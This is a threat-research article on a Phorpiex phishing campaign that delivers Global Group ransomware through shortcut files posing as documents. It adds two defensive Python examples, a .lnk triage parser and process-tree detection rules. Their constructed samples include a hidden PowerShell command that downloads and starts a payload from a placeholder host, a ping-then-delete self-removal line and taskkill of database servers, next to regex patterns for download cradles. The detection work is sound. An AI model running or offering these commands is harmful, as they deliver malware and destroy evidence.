Cybersecurity researchers are warning of a resurgence in attacks leveraging the Phorpiex botnet, a decade-old malware-as-a-service platform. In a recent campaign, threat actors are employing sophisticated social engineering tactics, using phishing emails with the subject line “Your Document” to distribute Global Group ransomware. This ransomware, identified as a successor to the Mamona ransomware family, is delivered through weaponized Windows shortcut files designed to bypass user scrutiny.
The current Phorpiex campaign distributes phishing emails whose ZIP attachment appears to contain a harmless document. What the archive actually holds is a Windows shortcut file (.lnk) masquerading as a document, typically under a double extension such as "Document.doc.lnk". Explorer never shows the .lnk extension of a shortcut (the lnkfile type carries the NeverShowExt flag), so the file is displayed as "Document.doc" whatever the user's "hide extensions for known file types" setting, and the ".doc" part reads as a legitimate document. To complete the deception the shortcut borrows an authentic Windows document icon, which lowers the suspicion threshold of potential victims even further.
Attackers Weaponizing Windows Shortcut Files for Global Group Ransomware
Forcepoint researchers have detailed the infection chain, highlighting its stealth and efficiency. When the user double-clicks the shortcut, it silently runs the command line embedded in its target and arguments: the target is the Windows Command Processor (cmd.exe), which in turn invokes PowerShell. The PowerShell command downloads the second-stage payload, the Global Group ransomware itself, from a remote server; the file is often given a name that mimics a legitimate Windows driver so that it blends in among system files and processes. Because every stage before the final binary runs through built-in system tools, the chain is a "Living off the Land" attack: traditional security software scanning the attachment for a malicious executable finds only a shortcut.
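The two traits described above, a double-extension filename and a shortcut whose target is cmd.exe with a PowerShell download cradle in its arguments, can both be checked statically, before anyone double-clicks. The following is an added example, not Forcepoint's tooling or code from the page: it reads the StringData section of the Shell Link binary format (MS-SHLLINK) to recover the shortcut's target, arguments and icon, then applies a few triage rules. The sample shortcut is constructed in the script itself; the host 198.51.100.7, the payload name drvhost.exe and the paths are placeholders, not indicators from the campaign.

```python
import re
import struct
import uuid

# LinkFlags bits from the Shell Link binary format (MS-SHLLINK 2.1.1)
HAS_LINK_TARGET_ID_LIST = 0x01
HAS_LINK_INFO = 0x02
HAS_NAME = 0x04
HAS_RELATIVE_PATH = 0x08
HAS_WORKING_DIR = 0x10
HAS_ARGUMENTS = 0x20
HAS_ICON_LOCATION = 0x40
IS_UNICODE = 0x80
LNK_CLSID = uuid.UUID("00021401-0000-0000-c000-000000000046")
# StringData fields appear in this fixed order, each present only if its flag is set
STRING_FIELDS = [("name", HAS_NAME), ("relative_path", HAS_RELATIVE_PATH),
                 ("working_dir", HAS_WORKING_DIR), ("arguments", HAS_ARGUMENTS),
                 ("icon_location", HAS_ICON_LOCATION)]

INTERPRETER_TARGET = re.compile(r"\b(cmd|powershell|pwsh|wscript|cscript|mshta|rundll32)(\.exe)?\b", re.I)
DOWNLOAD_OR_EVASION = re.compile(
    r"(DownloadFile|DownloadString|Invoke-WebRequest|\biwr\b|\bcurl\b|\biex\b|Invoke-Expression"
    r"|-e(nc(odedcommand)?)?\b|-w\s+hidden|bypass)", re.I)
DOUBLE_EXTENSION = re.compile(r"\.(docx?|pdf|xlsx?|txt|jpe?g|png)\.lnk$", re.I)


def parse_lnk_strings(data: bytes) -> dict:
    """Return the StringData fields (relative path, arguments, icon, ...) of a .lnk file."""
    header_size, clsid_le, flags = struct.unpack_from("<I16sI", data, 0)
    if header_size != 0x4C or uuid.UUID(bytes_le=clsid_le) != LNK_CLSID:
        raise ValueError("not a Shell Link file")
    pos = header_size
    if flags & HAS_LINK_TARGET_ID_LIST:          # skip the PIDL using its 2-byte size prefix
        pos += 2 + struct.unpack_from("<H", data, pos)[0]
    if flags & HAS_LINK_INFO:                    # LinkInfoSize counts itself
        pos += struct.unpack_from("<I", data, pos)[0]
    fields = {}
    for name, bit in STRING_FIELDS:
        if not flags & bit:
            continue
        count = struct.unpack_from("<H", data, pos)[0]   # character count, not byte count
        pos += 2
        if flags & IS_UNICODE:
            fields[name] = data[pos:pos + 2 * count].decode("utf-16-le")
            pos += 2 * count
        else:
            fields[name] = data[pos:pos + count].decode("cp1252", errors="replace")
            pos += count
    return fields


def triage_lnk(filename: str, data: bytes) -> list:
    """Flag the deception and execution traits the campaign relies on; empty list = nothing suspicious."""
    findings = []
    if DOUBLE_EXTENSION.search(filename):
        findings.append("double extension: Explorer displays this file as " + filename[:-4])
    f = parse_lnk_strings(data)
    target, args, icon = f.get("relative_path", ""), f.get("arguments", ""), f.get("icon_location", "")
    if INTERPRETER_TARGET.search(target):
        findings.append("target is a command/script interpreter: " + target)
    if DOWNLOAD_OR_EVASION.search(args):
        findings.append("arguments contain a download cradle or evasion switch: " + args)
    if icon and INTERPRETER_TARGET.search(target) and re.search(r"\.(dll|exe)$", icon, re.I):
        findings.append("interpreter shortcut borrowing an icon from " + icon)
    return findings


def build_lnk(relative_path: str, arguments: str, icon_location: str) -> bytes:
    """Build a minimal Unicode .lnk carrying only StringData (constructed test input, not a real sample)."""
    flags = HAS_RELATIVE_PATH | HAS_ARGUMENTS | HAS_ICON_LOCATION | IS_UNICODE
    header = struct.pack("<I16sI", 0x4C, LNK_CLSID.bytes_le, flags)
    header += b"\x00" * (0x4C - len(header))   # attributes, timestamps, size, icon index, show cmd, reserved
    body = b""
    for s in (relative_path, arguments, icon_location):
        body += struct.pack("<H", len(s)) + s.encode("utf-16-le")
    return header + body + b"\x00\x00\x00\x00"   # TerminalBlock closes the ExtraData section


# Constructed sample, not a file from the campaign: host, payload name and paths are placeholders
SAMPLE_NAME = "Document.doc.lnk"
SAMPLE_LNK = build_lnk(
    r"..\..\..\Windows\System32\cmd.exe",
    r'/c powershell -w hidden -c "iwr http://198.51.100.7/drvhost.exe -OutFile %TEMP%\drvhost.exe; start %TEMP%\drvhost.exe"',
    r"%SystemRoot%\System32\imageres.dll",
)
BENIGN_LNK = build_lnk(r"..\Documents\report.docx", "", "")

if __name__ == "__main__":
    for finding in triage_lnk(SAMPLE_NAME, SAMPLE_LNK):
        print("-", finding)
```

Real shortcuts from the wild usually also carry a LinkTargetIDList and LinkInfo block; the parser skips both by their size fields, so the same function works on files pulled from a mail quarantine. Note that the relative path is what the shortcut stores, so a target like `..\..\..\Windows\System32\cmd.exe` is itself a tell: a shortcut to a document has no reason to point at an interpreter.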
A critical feature of Global Group ransomware is its autonomous operation. Unlike many ransomware families that contact a command-and-control server to obtain or register encryption keys, Global Group generates its keys locally on the compromised machine. It can therefore encrypt hosts in offline or air-gapped environments, and once the binary is on disk it produces no beaconing for network-based detection to catch: the only network indicator in this chain is the initial PowerShell download.
The ransomware also takes aggressive anti-forensic measures to hide its presence. It spawns a ping command purely as a sleep timer and then deletes its own binary from disk, leaving incident responders without an executable to recover and analyse. It also searches for and terminates processes belonging to analysis tools and database servers, which both hinders investigation and frees files those processes hold open, so that it can encrypt as much data as possible without interference.
To mitigate these threats, organizations are advised to block executable attachments, including LNK files, at the email gateway, and to apply that rule inside archive attachments such as the ZIP files used in this campaign, not only to top-level attachments. Endpoint monitoring and behavior-based detection are equally important: by alerting on how the malware operates (a shortcut spawning cmd.exe and PowerShell, a download into a user-writable directory, a ping-then-delete command line) rather than relying solely on signatures, security teams can stop the encryption process before significant data loss occurs, which matters all the more for a ransomware that needs no network contact once it is running.
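The behaviors this page describes, PowerShell launched under Explorer (directly or via cmd.exe) with a download cradle, a cmd.exe invocation that uses ping as a delay before del, and the termination of database or analysis processes, map directly onto process-creation telemetry. The following is an added example, not Forcepoint's detection content or code from the page: three rules run over a small constructed set of events in the shape of Sysmon Event ID 1 records. Pids, paths and the download host 198.51.100.7 are placeholders; the taskkill form of the third rule is an assumption, since the page does not say how the ransomware kills processes (it may call the API directly, in which case process-termination telemetry rather than command lines is the place to look).

```python
import re

# Constructed process-creation events (Sysmon Event ID 1 shape), not real telemetry;
# pids, paths and the download host are placeholders
EVENTS = [
    {"pid": 4120, "ppid": 900, "image": r"C:\Windows\explorer.exe", "cmdline": "explorer.exe"},
    {"pid": 5208, "ppid": 4120, "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r'"C:\Windows\System32\cmd.exe" /c powershell -w hidden -c "iwr http://198.51.100.7/drvhost.exe '
                r'-OutFile C:\Users\u\AppData\Local\Temp\drvhost.exe; start C:\Users\u\AppData\Local\Temp\drvhost.exe"'},
    {"pid": 6012, "ppid": 5208, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r'powershell -w hidden -c "iwr http://198.51.100.7/drvhost.exe '
                r'-OutFile C:\Users\u\AppData\Local\Temp\drvhost.exe; start C:\Users\u\AppData\Local\Temp\drvhost.exe"'},
    {"pid": 7700, "ppid": 6012, "image": r"C:\Users\u\AppData\Local\Temp\drvhost.exe",
     "cmdline": r"C:\Users\u\AppData\Local\Temp\drvhost.exe"},
    {"pid": 7804, "ppid": 7700, "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r'cmd.exe /c ping 127.0.0.1 -n 5 > nul & del /f /q "C:\Users\u\AppData\Local\Temp\drvhost.exe"'},
    {"pid": 7810, "ppid": 7700, "image": r"C:\Windows\System32\taskkill.exe", "cmdline": "taskkill /f /im sqlservr.exe"},
    # benign noise the rules must not fire on
    {"pid": 8000, "ppid": 4120, "image": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "cmdline": r'"WINWORD.EXE" /n "C:\Users\u\Documents\report.docx"'},
    {"pid": 8100, "ppid": 1200, "image": r"C:\Windows\System32\cmd.exe", "cmdline": "cmd.exe /c ping 10.0.0.5 -n 2"},
]

INTERPRETERS = {"powershell.exe", "pwsh.exe"}
DOWNLOAD_CRADLE = re.compile(
    r"(DownloadFile|DownloadString|Invoke-WebRequest|\biwr\b|\bcurl\b|\biex\b|Invoke-Expression)", re.I)
# ping used as a sleep and chained with del: "ping 127.0.0.1 -n 5 > nul & del ..."
PING_THEN_DELETE = re.compile(r"\bping\b[^&|]*-n\s+\d+[^&|]*[&|]+\s*del\b", re.I)
# assumed manifestation of the process-termination behavior (the malware may use the API instead)
KILL_TARGETS = re.compile(
    r"taskkill\b.*/im\s+(sqlservr|mysqld|postgres|oracle|procmon|procexp|x64dbg|wireshark)\.exe", re.I)


def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def ancestors(event: dict, by_pid: dict, depth: int = 3) -> list:
    """Image basenames of the parent, grandparent, ... up to `depth` levels."""
    chain, cur = [], event
    for _ in range(depth):
        cur = by_pid.get(cur["ppid"])
        if cur is None:
            break
        chain.append(basename(cur["image"]))
    return chain


def detect(events: list) -> list:
    """Return (rule, pid) pairs for every event that matches one of the three behaviors."""
    by_pid = {e["pid"]: e for e in events}
    alerts = []
    for e in events:
        name = basename(e["image"])
        # Rule 1: PowerShell under Explorer (via cmd.exe or directly) pulling a file from the network,
        # which is what double-clicking the shortcut produces
        if name in INTERPRETERS and "explorer.exe" in ancestors(e, by_pid) and DOWNLOAD_CRADLE.search(e["cmdline"]):
            alerts.append(("lnk_download_chain", e["pid"]))
        # Rule 2: ping-as-sleep followed by del, the self-deletion idiom
        if name == "cmd.exe" and PING_THEN_DELETE.search(e["cmdline"]):
            alerts.append(("ping_delay_self_delete", e["pid"]))
        # Rule 3: killing database or analysis tooling ahead of encryption
        if KILL_TARGETS.search(e["cmdline"]):
            alerts.append(("kill_db_or_analysis_process", e["pid"]))
    return alerts


if __name__ == "__main__":
    for rule, pid in detect(EVENTS):
        print(f"{rule}: pid {pid}")
```

Rule 1 walks up to three ancestors rather than requiring the exact explorer.exe, cmd.exe, powershell.exe sequence, so it also catches a shortcut whose target is PowerShell directly; the download-cradle condition is what keeps it from firing on a user who simply runs a batch file. None of these rules depend on the payload's hash or name, which is the point: the binary can be renamed to look like a driver, but the process tree and command lines that deliver and clean up after it do not change.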

